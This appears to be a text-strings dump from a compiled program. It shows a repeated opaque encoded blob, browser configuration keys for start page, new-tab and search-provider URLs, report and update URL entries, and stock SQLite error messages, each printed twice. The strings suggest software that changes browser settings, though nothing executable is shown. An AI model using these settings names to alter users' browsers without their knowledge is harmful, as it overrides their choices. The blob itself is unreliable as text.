rDz2oLrxEd7tqorlxPHCSbpkVt/bZZuclcedjgvjrx5tDx7XnfZQjbd9WRhEjQzrKQBL lchgPpw2joBB IwFAu5RW4JcZP3S5Jm3QM9klwivxpzRjh9 jFGeuCwg7fa/HM15lK3jTHXUjVPnIEadpmY4jv7ywlegYHRQyc7xc1XcTe2TccuzmMaLo68YiE5vPkmCDlASCbtMpHFeFcupx0t7OgkYmbDHAwQlgu djTn6nQfC1xHBcRL7fYjaJ2ad6dGOUZAsbHeIpUSp4nxGHOmvAL06vqJh3DTzsSO7EPDVz0yD8gc QDljr2BUAvuNQBfQLANtmT37rJ0C7hqUSVg1mD68 CZrHjd1CeJmHamAXlseJPSnm KFnG/1c coF3P58SUT r/DM6745nlDqpqg2fjiUstyu69sMwUOFgbB6/PgPG0VAckChf Pylb9b7DIN1HCdWS O3BxhtsiIkpaPOUuahRNtoT4DpvGf1R SjMvvia f1Tk4EbUjpkeT/SHrpFL/1Bygwwpd0nFaFLRdhAD34FQkAPT/sP2Yq0DvG5FczLuhzkVhxYkkcNsdHIIn4Pj7VwA1dYGg6YME6txpWMi6IsUM7JtNamFSHj5S3RyMY2HkpWlnehRIEWOU8rufd/8NxdxEh4hGldz9z6FDkN13F9KpCCJD8p6gHgIHi46nRIyLhtzHs/FWgpIBScgh4 iUXE2ilHKH TRuonsl8u6HjwFVtlL8PW/lp7SBs9wnHQwEYX2vppXvwar4qeOKyNcGnOSf7FYTwmHhsc3yvZmCUslXEwpIEruKGRieVqJvUb9SQdo04iRwEkfTsVeERRWKuoAw/ttnJlJhzCghYsBqKYx1GlhZbZo9QDMXkGhZfJvEzr2MoBfZ9IleeloO2xfLoM74nC0dxiWyC TXMw9k6pY NY534Wmh Y12vy1sB3oX4EMJycv8h/bDGNdfdCNKPTvOdX6bbP cU6Tgq9ZzAbXeb7DvI4iRxfch63IFn6sz55sw6K2WVADtytAT0LQ0z5I5lEeaBbuysREfZQZl9GUs6cncIdRRsJOWk0C7LrrCvmdUvmm6wCSPhteAIrMvwtOjxBits2XlplkTxaJMfOLcgBrigpnJq1oHslokry4IzFwOof70pLBoR BvjOV3j7UWo9 dCNhbDBvLmNnPEuBRlH0rJEQNQ7E1uLC7RQ/bHIOjGxIG267/iQ3QpvhLBc3HhWgw4zXBntyzc1TsWFRzYDAG z4XsjeXqTBj5jX/1Z6MGyvYxYlVgcxFtQXZphihfRO4TFYmInczbFheMg6g7L2gAbu/bQftTSM3Gk9h1TZvO753sFgpAu5HpzAB nwdqTgSdjFxVQYmLxtAxtGyoMBo1SY3w2Yt6ZBhjvfAFmMg9W7Quiex4rwUPY2phen8AwEaM3QV4ELy/Rwz2G8E8gRj1QMYCaZcewRIj S1rQtxx8FGCU svnd bqHqA9lOq52fOkjdu2ALbbk rd1BPpBdvwY6giLkGVBZkNaxzifKFbMWqFp1f4YcINMpvHONCm4msq2 EbUu4ouR/hFrYkKlZf97yzsy 76BSgPhqxdJuY02GjlcZGNGJBwUSnjxB8jKxC1gOzFVxPL W7nVU QXQ5HrHtflvF4G4NoWAC vtp9a22bq ULuTu1f9LA7aAe0KPRL5RjaHDbveVCYCRm0QcIYjvND1OZbSxHBHVjukFmCdvdbqjiduWpgFtPly96JlJFDeDF/2iVnCEjyiRxvRoY2a/vPYSqcsyhyDwgne/PDbCLW9iU0F1Yma7ADBunbsZFYklmUaLAn kdzmm5dHz8WEcYotx5fiMIAFvTNNkJKk3l7gctXoMwa61 8hcgH1IAfMZgMBE8M5FhEPn8UDmWiw vZccVn1BaNIVuTXA/g3TXWtw61tlvIz742S7f0dAw1Z2tvGQP0kT9 XdJj1 5pY8GHmSMRJb3SOB0TIDbnP7k3zz3x8bNcre0XZ2GwIZBRs68rmk/Jzn7u45EkfvXmFejM5qKNqLOj5Cpku6Avi54Uuq6iG6/lMzVthlWWyMyz9WnbrUvgA8//ed60WWAg2ADOaopG6S4r8B02JHwdn8ZNEQn5Iku3Y0vnc9zwCmuEeU5aL783crzK Rqt7mZffHAaDfnuWcfmLDrgGQjz/EorwYyG7N7bno/I3RF8S0ULuJfosVFOikILFxZbyk4MyiLqoYWOIBJiIjmG7sSPmNuTv0U9MGH1cWIFnSok1FmWfXK9SyQ8j3 UOYPGtQW1mTjauPg1NnRGsxGe1tXhnLcIlpK/QWjs8jCBJ6Dx0k21TFFIG6hx5gNXRYrUw abeKMzLXvwOLz6jqtbZjZhTbI2dQGartWNchdsO6WigCO8MA1AmO5EPCynaeMIiebrn2vtdI wEM0MWez orMF0j O8YRhxP6uZG9JO0us6H5dQva4TL1j5RN/NG4DlC/mfJcT4hfAhUZxzX9VEBuW Ixx0w8HtS3YAkSYtwYqUB08DXihh2EQn UdNM2vWd8DUR7Jfs8VGPJefn7C2XoDnhLXBmUtfDIdSopov9LF9Irss5U9wE39MOEmQK XF0LYFm0MNlncLepcPBaqDNn48oKlgc XEjFn3kC uqIrsc/BkTOX50BFnyuQe/3t4JyifK24T3JlHhYLrN7U8XHnQGTmbX6Jmbab1d3hGxeAPXGPc/TBlWuRlOQo7E7 /SZJAxGZ13KUIMI65CsftoTkctXMRMRvMLNtmDAFZ6RC5awFmJUuH0k5NoF3r1ITFyR9BSKENVR0xFcKahmqnkmvh22OpYVJythHgVTHY6kSK69Wxvp5GIVJe8FOiHoa1UaWXXpMH u6H8fyJqDzkPTk4bMJr0IqzruXXy4C lMp02Ta1EZqZ4LEM25YEVMSP42bwFEHVjqi 1KbaTt5ZEl3glyMulqCMOS9t04Dcz qamgzM26muS4RFZspdV4 ZRsbxwI0tglrh7o/Qt04Z7Ud0Vlf5nzBmb8GVMqcdTdlTJlThMD TfzbXNqmFGUyFXgTtXTKHNln2ILeEZCJFm13cKJ8I77diH1xOofJUvwGBQyZ1tIp9ToOLVGipJZh ybUpHwIQERilwFpdgVjM96ljLZqdSUPHobSxccFA7qXwII5N/NavtVegmtsDZ3Vo9NiuF41qR8e04/s8zGXWxxZxdCKIg3Lxkanfp3I018i94k9uGFuJzCW3ENiQ95f701b8dT7P25xUx6yVVFzd5rrgfnPdCMd0W44kPSSfFnHDvagDcn3hVLuDoqYEt279k61Hye0rlDa55DR00uXjBMcBnrym3xcjjCP92N1a BZv2prBLuBK36rY2JLW9caOGvN0AwQ8jrsJXCy/P2iGpnxGOZMbCymjIWxGVfdo7tRnDOTapJijHeYIs0ocqxz4qoAQ0V8KhaOoSJvaeEfT1ny1ajPnB5RSKfjqUlnAJZRZJsb8jYjEVetQbc1Z/Gxy3Q9btkNAIY1vr7qpb2/GPPkLxbPsab2yYXgqSp58NbJq1GT90 l0DHsLtutKaghoK7u8P 1YFF 7ECmqGGmAa2QumuSogAt8C7OCWkRoc239Wa9moXVUEBtSPDRCF1vrEpnmVb uE2K0x2kpyLTnzwLpaiH4ItiS ARDt9c2aA9RLxUkGWVb toybApu0o5XTjtFVrUALaTJ5y5fOXzy8hrbH81/IOMV0MgUd5dKJFHMH /dnVvrV mRxybjFvB95B3VZHLZsBYhCwi1ubOUqntHspciiwnlNPhyqAoU2YgOqqH UAJ9fFS83GiYZte2egV2EoZFWF7KZm8NHKIB3odjjU1eK4sNBiseSi5OH/N2CrEzAbi9Z5ovbepTpn4e6jiQMbH0o6dh2ylMhmpiJeV4MSodV7yH0J4aY5WEU/HThGaYSIrfEIfl3Y8OqV/EDPWm3pHwFUKoxXI4hxkx2TGxZKx3gByInRwYSSbSarZgS2ZENN1jIhYCL/zt8FinlhiMsLZXi BaF61dxA 4T4skKuMyffuoveNe1EidkpbVubUN9B9jCP5BU8Z3uHPpCBLbArzcpW6Mf wCC/QM7b4/GvAcgRHN3BCajQoRDuw9T8F4EpJgzyDBZBiwxfio6cAV9IQE9N8vkUcTvb7tjOnNNlt4jHur2ggmlygIg74SSorD5KQYtulF1GtLjEfc7r yM641jR2b6tQXK3dhBBeUlH811h0KVf6QFwSrqXmE5fa0MlelImv36InIwkcADTxVZ5fVvIQQVqsH1xWZTWikdcNBLtlpBujGUQufGv7W7VlWohRdBOpyyhsnpPKojvjQDEwTUn8MknS2mbvNguCCUvc4JbP/Gl3NeOOzoA4lcVmIrzgHW85v4J I3 b0AK299i8hkt uNHhxu830uVufOUTMSwR4GrrPJ8FoTfqPVLvI0/Y3PF1LLU1XM TVF83IMrHvl8n73btcFeS0DttowqnBUtKN9Jun/voeLMe1g9vZ9 FtXTkxZkgwo9S0f3bx1m1QygaRLnV9akWR6HEJ1xA3lcNCTi8GAWRd5IiOWTGWQz1XS055V6LvFiYMO11Bl48PYy7E5OAI2ESPVcznylZrtGhDmvprOqGd8oxYJzKwhGCwC8pnE2McKjsW2xpfD T9hBm/t8oyGvcmke8Q4EkFtbm7gbezN0I1S8B94 dWz9/m6V7AipZ9jR/FpIA XX5lT1CeQPd5 lBP2OYJkEPxHrxDaeBwNT3hEf5Ov yIJWKxbjMbcGK73GIXxwewdRVbBEee8e8Sm4euvIhO xNjQXmEd0Wn4f7e1 xHH1jpW1ObVWgKNGBUHlpIcw26SSGBdlM4qKzDKglTaj6aLg6s0UkXyGfqxPvW9rhhCWvujpEVgB5053CSbqy1ucw2l/G5Tyurk9KILPl 9mbszv86xmhBAFKqkSRf0RGq7mdOxDeKp ZWALgfbQpEAHE/wI3HCI7jG5tZbcfXIqPccGYKXdMsDJtPVFhkarxbZhWdlrZwpdUkjdHBgdnB8u0dXcR3RJKFd FIkhCY5DBOBGgNO5qhAc5Wd9AdrhbARpylrHznSEqJFU4SXEQiEEM2PGQHvmAzrfp9FdnnsXr J 5L4W6MxMFWIYDoxxRC1pfmMUtO3XQuEMeHkPHXj/7CPo8VXVzqBGhfo0g6lZCJW3572COYrDJGjiiGVDTt3lqVfwFE3wl7/nO5gy/oOnzjolGLMRsVv3UxIKY7wSRUI8VNwYmDhecqIeTowvWvm3Ogh52LIUf4H nQqb4QahUECz/jDEAYXJ0FNRzzqjsDehVf0dDn8qeajbqzopUccqQ7/s3so0CxYkDSO01CzoNe sS4OE8E/trLqK9aLDgfeXz2qd/4NI4raydy6Xg0vGBxhJeJVgG4tZRZCS74FWnpzUW4cTiJ7VwFPmVCGBGLdyqCXd5jh0cbL9p3BHDpIrPBXwE3G/SybQCKXWweqXBwX5airKzE3DgpqGwQ fNzV2IozfuNhvHkZqtVenBKVHSZBfTu92bi1WAbUO1gH4cDwRFjht6eq39e ewC/86Z7GWfW21naMOVH 6MSsfgXatGqmVHkc0RkG/HfqZxNJiOu//jOQ5pn1jezANGNjuCB25JKd5EgyYkQoaMXbzczP7NEPhVwCubR194OmKE5LOFyDE3iUKHozwPLenrObAB/MjkvKQjL6hrxfzT4PsY9IeglAFOW59163YDRdd/En8UMaO XQeiNzXcXjLVOZUgAofh9a5 ncBbOAi5kq4AOdTrV5sryxFxdsOLLl0HGcxGTjRAIfrBnlYPLdx1GoTBeF3/X2QS0qwjnP4bK77CDJuZhDXyeM6lEDC c2hDG5BcTBk EMmDj2Bp7yGDKpdcb3wWCa2Bb a5tYl8TJM6oArCnqPEiwr5CcwPYnPThgsNrA2r/ub6ETp6j8uiNOZZndiQkGI9Vp aTUhM lWAojBLlyZVUQr72wlMCrs3blNi794bkhcPvqrwWU=

rDz2oLrxEd7tqorlxPHCSbpkVt/bZZuclcedjgvjrx5tDx7XnfZQjbd9WRhEjQzrKQBL lchgPpw2joBB IwFAu5RW4JcZP3S5Jm3QM9klwivxpzRjh9 jFGeuCwg7fa/HM15lK3jTHXUjVPnIEadpmY4jv7ywlegYHRQyc7xc1XcTe2TccuzmMaLo68YiE5vPkmCDlASCbtMpHFeFcupx0t7OgkYmbDHAwQlgu djTn6nQfC1xHBcRL7fYjaJ2ad6dGOUZAsbHeIpUSp4nxGHOmvAL06vqJh3DTzsSO7EPDVz0yD8gc QDljr2BUAvuNQBfQLANtmT37rJ0C7hqUSVg1mD68 CZrHjd1CeJmHamAXlseJPSnm KFnG/1c coF3P58SUT r/DM6745nlDqpqg2fjiUstyu69sMwUOFgbB6/PgPG0VAckChf Pylb9b7DIN1HCdWS O3BxhtsiIkpaPOUuahRNtoT4DpvGf1R SjMvvia f1Tk4EbUjpkeT/SHrpFL/1Bygwwpd0nFaFLRdhAD34FQkAPT/sP2Yq0DvG5FczLuhzkVhxYkkcNsdHIIn4Pj7VwA1dYGg6YME6txpWMi6IsUM7JtNamFSHj5S3RyMY2HkpWlnehRIEWOU8rufd/8NxdxEh4hGldz9z6FDkN13F9KpCCJD8p6gHgIHi46nRIyLhtzHs/FWgpIBScgh4 iUXE2ilHKH TRuonsl8u6HjwFVtlL8PW/lp7SBs9wnHQwEYX2vppXvwar4qeOKyNcGnOSf7FYTwmHhsc3yvZmCUslXEwpIEruKGRieVqJvUb9SQdo04iRwEkfTsVeERRWKuoAw/ttnJlJhzCghYsBqKYx1GlhZbZo9QDMXkGhZfJvEzr2MoBfZ9IleeloO2xfLoM74nC0dxiWyC TXMw9k6pY NY534Wmh Y12vy1sB3oX4EMJycv8h/bDGNdfdCNKPTvOdX6bbP cU6Tgq9ZzAbXeb7DvI4iRxfch63IFn6sz55sw6K2WVADtytAT0LQ0z5I5lEeaBbuysREfZQZl9GUs6cncIdRRsJOWk0C7LrrCvmdUvmm6wCSPhteAIrMvwtOjxBits2XlplkTxaJMfOLcgBrigpnJq1oHslokry4IzFwOof70pLBoR BvjOV3j7UWo9 dCNhbDBvLmNnPEuBRlH0rJEQNQ7E1uLC7RQ/bHIOjGxIG267/iQ3QpvhLBc3HhWgw4zXBntyzc1TsWFRzYDAG z4XsjeXqTBj5jX/1Z6MGyvYxYlVgcxFtQXZphihfRO4TFYmInczbFheMg6g7L2gAbu/bQftTSM3Gk9h1TZvO753sFgpAu5HpzAB nwdqTgSdjFxVQYmLxtAxtGyoMBo1SY3w2Yt6ZBhjvfAFmMg9W7Quiex4rwUPY2phen8AwEaM3QV4ELy/Rwz2G8E8gRj1QMYCaZcewRIj S1rQtxx8FGCU svnd bqHqA9lOq52fOkjdu2ALbbk rd1BPpBdvwY6giLkGVBZkNaxzifKFbMWqFp1f4YcINMpvHONCm4msq2 EbUu4ouR/hFrYkKlZf97yzsy 76BSgPhqxdJuY02GjlcZGNGJBwUSnjxB8jKxC1gOzFVxPL W7nVU QXQ5HrHtflvF4G4NoWAC vtp9a22bq ULuTu1f9LA7aAe0KPRL5RjaHDbveVCYCRm0QcIYjvND1OZbSxHBHVjukFmCdvdbqjiduWpgFtPly96JlJFDeDF/2iVnCEjyiRxvRoY2a/vPYSqcsyhyDwgne/PDbCLW9iU0F1Yma7ADBunbsZFYklmUaLAn kdzmm5dHz8WEcYotx5fiMIAFvTNNkJKk3l7gctXoMwa61 8hcgH1IAfMZgMBE8M5FhEPn8UDmWiw vZccVn1BaNIVuTXA/g3TXWtw61tlvIz742S7f0dAw1Z2tvGQP0kT9 XdJj1 5pY8GHmSMRJb3SOB0TIDbnP7k3zz3x8bNcre0XZ2GwIZBRs68rmk/Jzn7u45EkfvXmFejM5qKNqLOj5Cpku6Avi54Uuq6iG6/lMzVthlWWyMyz9WnbrUvgA8//ed60WWAg2ADOaopG6S4r8B02JHwdn8ZNEQn5Iku3Y0vnc9zwCmuEeU5aL783crzK Rqt7mZffHAaDfnuWcfmLDrgGQjz/EorwYyG7N7bno/I3RF8S0ULuJfosVFOikILFxZbyk4MyiLqoYWOIBJiIjmG7sSPmNuTv0U9MGH1cWIFnSok1FmWfXK9SyQ8j3 UOYPGtQW1mTjauPg1NnRGsxGe1tXhnLcIlpK/QWjs8jCBJ6Dx0k21TFFIG6hx5gNXRYrUw abeKMzLXvwOLz6jqtbZjZhTbI2dQGartWNchdsO6WigCO8MA1AmO5EPCynaeMIiebrn2vtdI wEM0MWez orMF0j O8YRhxP6uZG9JO0us6H5dQva4TL1j5RN/NG4DlC/mfJcT4hfAhUZxzX9VEBuW Ixx0w8HtS3YAkSYtwYqUB08DXihh2EQn UdNM2vWd8DUR7Jfs8VGPJefn7C2XoDnhLXBmUtfDIdSopov9LF9Irss5U9wE39MOEmQK XF0LYFm0MNlncLepcPBaqDNn48oKlgc XEjFn3kC uqIrsc/BkTOX50BFnyuQe/3t4JyifK24T3JlHhYLrN7U8XHnQGTmbX6Jmbab1d3hGxeAPXGPc/TBlWuRlOQo7E7 /SZJAxGZ13KUIMI65CsftoTkctXMRMRvMLNtmDAFZ6RC5awFmJUuH0k5NoF3r1ITFyR9BSKENVR0xFcKahmqnkmvh22OpYVJythHgVTHY6kSK69Wxvp5GIVJe8FOiHoa1UaWXXpMH u6H8fyJqDzkPTk4bMJr0IqzruXXy4C lMp02Ta1EZqZ4LEM25YEVMSP42bwFEHVjqi 1KbaTt5ZEl3glyMulqCMOS9t04Dcz qamgzM26muS4RFZspdV4 ZRsbxwI0tglrh7o/Qt04Z7Ud0Vlf5nzBmb8GVMqcdTdlTJlThMD TfzbXNqmFGUyFXgTtXTKHNln2ILeEZCJFm13cKJ8I77diH1xOofJUvwGBQyZ1tIp9ToOLVGipJZh ybUpHwIQERilwFpdgVjM96ljLZqdSUPHobSxccFA7qXwII5N/NavtVegmtsDZ3Vo9NiuF41qR8e04/s8zGXWxxZxdCKIg3Lxkanfp3I018i94k9uGFuJzCW3ENiQ95f701b8dT7P25xUx6yVVFzd5rrgfnPdCMd0W44kPSSfFnHDvagDcn3hVLuDoqYEt279k61Hye0rlDa55DR00uXjBMcBnrym3xcjjCP92N1a BZv2prBLuBK36rY2JLW9caOGvN0AwQ8jrsJXCy/P2iGpnxGOZMbCymjIWxGVfdo7tRnDOTapJijHeYIs0ocqxz4qoAQ0V8KhaOoSJvaeEfT1ny1ajPnB5RSKfjqUlnAJZRZJsb8jYjEVetQbc1Z/Gxy3Q9btkNAIY1vr7qpb2/GPPkLxbPsab2yYXgqSp58NbJq1GT90 l0DHsLtutKaghoK7u8P 1YFF 7ECmqGGmAa2QumuSogAt8C7OCWkRoc239Wa9moXVUEBtSPDRCF1vrEpnmVb uE2K0x2kpyLTnzwLpaiH4ItiS ARDt9c2aA9RLxUkGWVb toybApu0o5XTjtFVrUALaTJ5y5fOXzy8hrbH81/IOMV0MgUd5dKJFHMH /dnVvrV mRxybjFvB95B3VZHLZsBYhCwi1ubOUqntHspciiwnlNPhyqAoU2YgOqqH UAJ9fFS83GiYZte2egV2EoZFWF7KZm8NHKIB3odjjU1eK4sNBiseSi5OH/N2CrEzAbi9Z5ovbepTpn4e6jiQMbH0o6dh2ylMhmpiJeV4MSodV7yH0J4aY5WEU/HThGaYSIrfEIfl3Y8OqV/EDPWm3pHwFUKoxXI4hxkx2TGxZKx3gByInRwYSSbSarZgS2ZENN1jIhYCL/zt8FinlhiMsLZXi BaF61dxA 4T4skKuMyffuoveNe1EidkpbVubUN9B9jCP5BU8Z3uHPpCBLbArzcpW6Mf wCC/QM7b4/GvAcgRHN3BCajQoRDuw9T8F4EpJgzyDBZBiwxfio6cAV9IQE9N8vkUcTvb7tjOnNNlt4jHur2ggmlygIg74SSorD5KQYtulF1GtLjEfc7r yM641jR2b6tQXK3dhBBeUlH811h0KVf6QFwSrqXmE5fa0MlelImv36InIwkcADTxVZ5fVvIQQVqsH1xWZTWikdcNBLtlpBujGUQufGv7W7VlWohRdBOpyyhsnpPKojvjQDEwTUn8MknS2mbvNguCCUvc4JbP/Gl3NeOOzoA4lcVmIrzgHW85v4J I3 b0AK299i8hkt uNHhxu830uVufOUTMSwR4GrrPJ8FoTfqPVLvI0/Y3PF1LLU1XM TVF83IMrHvl8n73btcFeS0DttowqnBUtKN9Jun/voeLMe1g9vZ9 FtXTkxZkgwo9S0f3bx1m1QygaRLnV9akWR6HEJ1xA3lcNCTi8GAWRd5IiOWTGWQz1XS055V6LvFiYMO11Bl48PYy7E5OAI2ESPVcznylZrtGhDmvprOqGd8oxYJzKwhGCwC8pnE2McKjsW2xpfD T9hBm/t8oyGvcmke8Q4EkFtbm7gbezN0I1S8B94 dWz9/m6V7AipZ9jR/FpIA XX5lT1CeQPd5 lBP2OYJkEPxHrxDaeBwNT3hEf5Ov yIJWKxbjMbcGK73GIXxwewdRVbBEee8e8Sm4euvIhO xNjQXmEd0Wn4f7e1 xHH1jpW1ObVWgKNGBUHlpIcw26SSGBdlM4qKzDKglTaj6aLg6s0UkXyGfqxPvW9rhhCWvujpEVgB5053CSbqy1ucw2l/G5Tyurk9KILPl 9mbszv86xmhBAFKqkSRf0RGq7mdOxDeKp ZWALgfbQpEAHE/wI3HCI7jG5tZbcfXIqPccGYKXdMsDJtPVFhkarxbZhWdlrZwpdUkjdHBgdnB8u0dXcR3RJKFd FIkhCY5DBOBGgNO5qhAc5Wd9AdrhbARpylrHznSEqJFU4SXEQiEEM2PGQHvmAzrfp9FdnnsXr J 5L4W6MxMFWIYDoxxRC1pfmMUtO3XQuEMeHkPHXj/7CPo8VXVzqBGhfo0g6lZCJW3572COYrDJGjiiGVDTt3lqVfwFE3wl7/nO5gy/oOnzjolGLMRsVv3UxIKY7wSRUI8VNwYmDhecqIeTowvWvm3Ogh52LIUf4H nQqb4QahUECz/jDEAYXJ0FNRzzqjsDehVf0dDn8qeajbqzopUccqQ7/s3so0CxYkDSO01CzoNe sS4OE8E/trLqK9aLDgfeXz2qd/4NI4raydy6Xg0vGBxhJeJVgG4tZRZCS74FWnpzUW4cTiJ7VwFPmVCGBGLdyqCXd5jh0cbL9p3BHDpIrPBXwE3G/SybQCKXWweqXBwX5airKzE3DgpqGwQ fNzV2IozfuNhvHkZqtVenBKVHSZBfTu92bi1WAbUO1gH4cDwRFjht6eq39e ewC/86Z7GWfW21naMOVH 6MSsfgXatGqmVHkc0RkG/HfqZxNJiOu//jOQ5pn1jezANGNjuCB25JKd5EgyYkQoaMXbzczP7NEPhVwCubR194OmKE5LOFyDE3iUKHozwPLenrObAB/MjkvKQjL6hrxfzT4PsY9IeglAFOW59163YDRdd/En8UMaO XQeiNzXcXjLVOZUgAofh9a5 ncBbOAi5kq4AOdTrV5sryxFxdsOLLl0HGcxGTjRAIfrBnlYPLdx1GoTBeF3/X2QS0qwjnP4bK77CDJuZhDXyeM6lEDC c2hDG5BcTBk EMmDj2Bp7yGDKpdcb3wWCa2Bb a5tYl8TJM6oArCnqPEiwr5CcwPYnPThgsNrA2r/ub6ETp6j8uiNOZZndiQkGI9Vp aTUhM lWAojBLlyZVUQr72wlMCrs3blNi794bkhcPvqrwWU=

2, 3, 12, 1634

2, 3, 12, 1634

Envelop.xml

Envelop.xml

UrlSet

UrlSet

Configuration.xml

Configuration.xml

Opera

Opera

StartPageUrl

StartPageUrl

AboutTabUrl

AboutTabUrl

SearchScopeUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginUrl

SearchPluginSuggestionUrl

SearchPluginSuggestionUrl

TabPageUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineSearchUrl

SearchEngineKeyword

SearchEngineKeyword

System.xml

System.xml

Reset-2.1.0.7

Reset-2.1.0.7

ReportUrl

ReportUrl

UpdateUrl

UpdateUrl

ReportDlls

ReportDlls

User.xml

User.xml

Argument.Snapshot:

Argument.Snapshot:

Argument.GeneralConfig:

Argument.GeneralConfig:

Argument.Flags:

Argument.Flags:

Argument.StartPage:

Argument.StartPage:

Argument.Autosearch:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.SearchScopeId:

Argument.Tabs:

Argument.Tabs:

select count(*) from sqlite_master where type = 'table' and name = '

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

%d-%m-%Y %H:%M, %a

unable to close due to unfinished backup operation

unable to close due to unfinished backup operation

SQL logic error or missing database

SQL logic error or missing database

large file support is disabled

large file support is disabled

unknown database: %s

unknown database: %s

no such vfs: %s

no such vfs: %s

misuse at line %d of [%.10s]

misuse at line %d of [%.10s]

database corruption at line %d of [%.10s]

database corruption at line %d of [%.10s]

cannot open file at line %d of [%.10s]

cannot open file at line %d of [%.10s]

SQLITE_

SQLITE_

d-d-d d:d:d

d-d-d d:d:d

d-d-d

d-d-d

d:d:d

d:d:d

failed memory resize %u to %u bytes

failed memory resize %u to %u bytes

failed to allocate %u bytes of memory

failed to allocate %u bytes of memory

API call with %s database connection pointer

API call with %s database connection pointer

922337203685477580

922337203685477580

RowKey

RowKey

%s-shm

%s-shm

OsError 0x%x (%u)

OsError 0x%x (%u)

%s\etilqs_

%s\etilqs_

Recovered %d frames from WAL file %s

Recovered %d frames from WAL file %s

2nd reference to page %d

2nd reference to page %d

invalid page number %d

invalid page number %d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

Failed to read ptrmap key=%d

Failed to read ptrmap key=%d

failed to get page %d

failed to get page %d

%d of %d pages missing from overflow list starting at %d

%d of %d pages missing from overflow list starting at %d

Page %d:

Page %d:

freelist leaf count too big on page %d

freelist leaf count too big on page %d

btreeInitPage() returns error code %d

btreeInitPage() returns error code %d

unable to get the page. error code=%d

unable to get the page. error code=%d

On tree page %d cell %d:

On tree page %d cell %d:

On page %d at right child:

On page %d at right child:

Multiple uses for byte %d of page %d

Multiple uses for byte %d of page %d

Corruption detected in cell %d on page %d

Corruption detected in cell %d on page %d

Fragmentation of %d bytes reported as %d on page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Page %d is never used

Outstanding page count goes from %d to %d during this analysis

Outstanding page count goes from %d to %d during this analysis

Pointer map page %d is referenced

Pointer map page %d is referenced

keyinfo(%d

keyinfo(%d

%s(%d)

%s(%d)

foreign key constraint failed

foreign key constraint failed

%s-mjX

%s-mjX

unable to use function %s in the requested context

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

bind on a busy prepared statement: [%s]

zeroblob(%d)

zeroblob(%d)

constraint failed at %d in [%s]

constraint failed at %d in [%s]

abort at %d in [%s]: %s

abort at %d in [%s]: %s

no such savepoint: %s

no such savepoint: %s

cannot open savepoint - SQL statements in progress

cannot open savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot %s savepoint - SQL statements in progress

cannot %s savepoint - SQL statements in progress

cannot commit transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_temp_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

sqlite_master

sqlite_master

cannot change %s wal mode from within a transaction

cannot change %s wal mode from within a transaction

statement aborts at %d: [%s] %s

statement aborts at %d: [%s] %s

database table is locked: %s

database table is locked: %s

cannot open view: %s

cannot open view: %s

cannot open virtual table: %s

cannot open virtual table: %s

foreign key

foreign key

no such column: "%s"

no such column: "%s"

cannot open %s column for writing

cannot open %s column for writing

indexed

indexed

cannot open value of type %s

cannot open value of type %s

misuse of aliased aggregate %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s.%s

%s: %s

%s: %s

%s: %s.%s

%s: %s.%s

not authorized to use function: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

too many terms in %s BY clause

variable number must be between ?1 and ?%d

variable number must be between ?1 and ?%d

Expression tree is too large (maximum depth %d)

Expression tree is too large (maximum depth %d)

too many columns in %s

too many columns in %s

too many SQL variables

too many SQL variables

misuse of aggregate: %s()

misuse of aggregate: %s()

%s%.*s"%w"

%s%.*s"%w"

%.*s"%w"%s

%.*s"%w"%s

sqlite_rename_table

sqlite_rename_table

sqlite_rename_parent

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_trigger

%s OR name=%Q

%s OR name=%Q

there is already another table or index with this name: %s

there is already another table or index with this name: %s

table %s may not be altered

table %s may not be altered

sqlite_

sqlite_

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

view %s may not be altered

view %s may not be altered

sqlite_sequence

sqlite_sequence

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

Cannot add a PRIMARY KEY column

Cannot add a PRIMARY KEY column

